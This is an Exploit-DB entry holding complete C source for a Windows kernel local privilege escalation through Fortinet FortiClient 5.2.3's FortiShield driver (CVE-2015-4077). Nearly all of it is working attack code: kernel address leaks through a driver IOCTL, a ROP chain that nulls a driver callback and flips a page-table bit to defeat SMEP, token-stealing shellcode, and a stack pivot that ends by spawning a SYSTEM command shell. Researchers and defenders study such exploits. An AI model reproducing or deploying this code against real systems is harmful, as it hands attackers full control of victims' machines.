Fortinet FortiClient 5.2.3 (Windows 10 x64 Creators) - Local Privilege Escalation

EDB-ID: 45149
Author: sickness & mschenk
Published: 2018-08-05
CVE: CVE-2015-4077...
Type: Local
Platform: Windows_x86-64
Vulnerable App: N/A

 #include <stdio.h> 
#include <Windows.h>
#include <Psapi.h>
#include <Shlobj.h>

#pragma comment (lib,"psapi")

PULONGLONG leak_buffer = (PULONGLONG)VirtualAlloc((LPVOID)0x000000001a000000, 0x2000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
ULONGLONG leakQWORD(ULONGLONG addr, HANDLE driver)
{
memset((LPVOID)0x000000001a000000, 0x11, 0x1000);
memset((LPVOID)0x000000001a001000, 0x22, 0x1000);
leak_buffer[0] = 0x000000001a000008;
leak_buffer[1] = 0x0000000000000003;
leak_buffer[4] = 0x000000001a000028;
leak_buffer[6] = addr - 0x70;

DWORD IoControlCode = 0x22608C;
LPVOID InputBuffer = (LPVOID)0x000000001a000000;
DWORD InputBufferLength = 0x20;
LPVOID OutputBuffer = (LPVOID)0x000000001a001000;
DWORD OutputBufferLength = 0x110;
DWORD lpBytesReturned;

BOOL triggerIOCTL;
triggerIOCTL = DeviceIoControl(driver, IoControlCode, InputBuffer, InputBufferLength, OutputBuffer, OutputBufferLength, &lpBytesReturned, NULL);
if (!triggerIOCTL)
{
printf("[!] Error in the SYSCALL: %d\n", GetLastError());
}

ULONGLONG result = leak_buffer[0x202];
return result;
}

ULONGLONG leakNtBase(HANDLE driver)
{
ULONGLONG teb = (ULONGLONG)NtCurrentTeb();
ULONGLONG thread = *(PULONGLONG)(teb + 0x78);
ULONGLONG threadInfo = leakQWORD(thread, driver);
ULONGLONG ntAddr = leakQWORD(threadInfo + 0x2a8, driver);
ULONGLONG baseAddr = 0;
ULONGLONG signature = 0x00905a4d;
ULONGLONG searchAddr = ntAddr & 0xFFFFFFFFFFFFF000;

while (TRUE)
{
ULONGLONG readData = leakQWORD(searchAddr, driver);
ULONGLONG tmp = readData & 0xFFFFFFFF;
/*
printf("%llx\n", readData);
printf("%llx\n", tmp);
*/

if (tmp == signature)
{
baseAddr = searchAddr;
break;
}
searchAddr = searchAddr - 0x1000;
}
return baseAddr;
}

ULONGLONG leakFortiBase(HANDLE driver, ULONGLONG ntBase)
{
ULONGLONG PsLoadModuleListAddr = ntBase + 0x34c5a0;
ULONGLONG searchAddr = leakQWORD(PsLoadModuleListAddr, driver);
ULONGLONG addr = 0;
while (1)
{
ULONGLONG namePointer = leakQWORD(searchAddr + 0x60, driver);
ULONGLONG name = leakQWORD(namePointer, driver);
if (name == 0x00740072006f0046)
{
name = leakQWORD(namePointer + 8, driver);
if (name == 0x0069006800530069)
{
addr = leakQWORD(searchAddr + 0x30, driver);
break;
}
}
searchAddr = leakQWORD(searchAddr, driver);
}
return addr;
}

ULONGLONG allocate_fake_stack(ULONGLONG ntBase, ULONGLONG fortishield_callback, ULONGLONG fortishield_restore, ULONGLONG pte_result)
{
PULONGLONG fake_stack = (PULONGLONG)VirtualAlloc((LPVOID)0x00000000f5ffe000, 0x12000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (fake_stack == NULL)
{
printf("[!] Error while allocating the fake stack: %d\n", GetLastError());
return 1;
}

memset(fake_stack, 0x41, 0x12000);
PULONGLONG ropStack = (PULONGLONG)fake_stack + 0x2000;
DWORD index = 0;

// <NULL Callback>
ropStack[index] = ntBase + 0x1684ef; index++; // pop rax ; pop rcx ; ret
ropStack[index] = fortishield_callback; index++; // FortiShield Callback
ropStack[index] = 0x0000000000000000; index++; // NULL
ropStack[index] = ntBase + 0x937eb; index++; // mov qword [rax], rcx ; ret
// </NULL Callback>

// <Flip U=S bit>
ropStack[index] = ntBase + 0x88614; index++; // pop rax ; ret
ropStack[index] = pte_result; index++; // PTE VA
ropStack[index] = ntBase + 0x1a3cb2; index++; // pop rdx ; ret
ropStack[index] = 0x0000000000000063; index++; // DIRTY + ACCESSED + R/W + PRESENT
ropStack[index] = ntBase + 0xe8a8b; index++; // mov byte [rax], dl ; add eax, 0x01740000 ; ret
ropStack[index] = ntBase + 0x11e000; index++; // wbinvd ; ret
// </Flip U=S bit>

// <Restore variables & shellcode>
ropStack[index] = 0x00000000f6000100; index++; // Shellcode address
ropStack[index] = fortishield_restore; index++; // FortiShield return location
// </Restore variables & shellcode>

char token_steal[] =
"\x48\x31\xc0\x65\x48\x8b\x80"
"\x88\x01\x00\x00\x48\x8b\x80"
"\xb8\x00\x00\x00\x49\x89\xc0"
"\x48\x8b\x80\xe8\x02\x00\x00"
"\x48\x2d\xe8\x02\x00\x00\x48"
"\x8b\x88\xe0\x02\x00\x00\x48"
"\x83\xf9\x04\x75\xe6\x4c\x8b"
"\x88\x58\x03\x00\x00\x4d\x89"
"\x88\x58\x03\x00\x00\x3E\x48"
"\x8B\x04\x24\x48\x89\xF4\x48"
"\x83\xEC\x20\xFF\xE0";

memcpy((fake_stack + 0x2020), token_steal, sizeof(token_steal));
return 0;
}

ULONGLONG get_pxe_address_64(ULONGLONG address, ULONGLONG pte_start)
{
ULONGLONG result = address >> 9;
result = result | pte_start;
result = result & (pte_start + 0x0000007ffffffff8);
return result;
}

int trigger_callback()
{
printf("[+] Creating dummy file\n");
system("echo test > C:\\Users\\n00b\\AppData\\LocalLow\\test.txt");
printf("[+] Calling MoveFileEx()\n");

BOOL MFEresult = MoveFileEx(L"C:\\Users\\n00b\\AppData\\LocalLow\\test.txt", L"C:\\Users\\n00b\\AppData\\LocalLow\\test2.txt", MOVEFILE_REPLACE_EXISTING);
if (MFEresult == 0)
{
printf("[!] Error while calling MoveFileEx(): %d\n", GetLastError());
return 1;
}
return 0;
}

int main()
{
LoadLibraryA("user32.dll"); // Populate Win32ThreadInfo

HANDLE mdare = CreateFile(L"\\\\.\\mdareDriver_48", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
if (mdare == INVALID_HANDLE_VALUE)
{
printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
return 1;
}

HANDLE forti = CreateFile(L"\\\\.\\FortiShield", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
if (forti == INVALID_HANDLE_VALUE)
{
printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
return 1;
}

LPDWORD hThread_id = 0;
HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&trigger_callback, NULL, CREATE_SUSPENDED, hThread_id);
if (hThread == NULL)
{
printf("[!] Error while calling CreateThread: %d\n", GetLastError());
return 1;
}

BOOL hThread_priority = SetThreadPriority(hThread, THREAD_PRIORITY_HIGHEST);
if (hThread_priority == 0)
{
printf("[!] Error while calling SetThreadPriority: %d\n", GetLastError());
return 1;
}

ULONGLONG ntBase = leakNtBase(mdare);
ULONGLONG ntPivot = ntBase + 0x1ab3ec; // mov esp, 0xf6000000; retn;
ULONGLONG ntMiGetPteAddressOffset = leakQWORD(ntBase + 0x62aeb, mdare);
ULONGLONG fortishieldBase = leakFortiBase(mdare, ntBase);
ULONGLONG fortishield_callback = fortishieldBase + 0xd150;
ULONGLONG fortishield_restore = fortishieldBase + 0x2f73;
printf("[+] ntoskrnl.exe base address is: 0x%llx\n", ntBase);
printf("[+] PTE VA start address is: 0x%llx\n", ntMiGetPteAddressOffset);
printf("[+] FortiShield.sys base address is: 0x%llx\n", fortishieldBase);

ULONGLONG pte_result = get_pxe_address_64(0xf6000000, ntMiGetPteAddressOffset);
printf("[+] PTE virtual address for 0xf6000000: %I64x\n", pte_result);
allocate_fake_stack(ntBase, fortishield_callback, fortishield_restore, pte_result);

DWORD IoControlCode = 0x220028;
ULONGLONG InputBuffer = ntPivot;
DWORD InputBufferLength = 0x8;
ULONGLONG OutputBuffer = 0x0;
DWORD OutputBufferLength = 0x0;
DWORD lpBytesReturned;

//DebugBreak();

BOOL triggerIOCTL = DeviceIoControl(forti, IoControlCode, (LPVOID)&InputBuffer, InputBufferLength, (LPVOID)&OutputBuffer, OutputBufferLength, &lpBytesReturned, NULL);
ResumeThread(hThread);
WaitForSingleObject(hThread, INFINITE);
system("start cmd.exe");

return 0;
}

Related Posts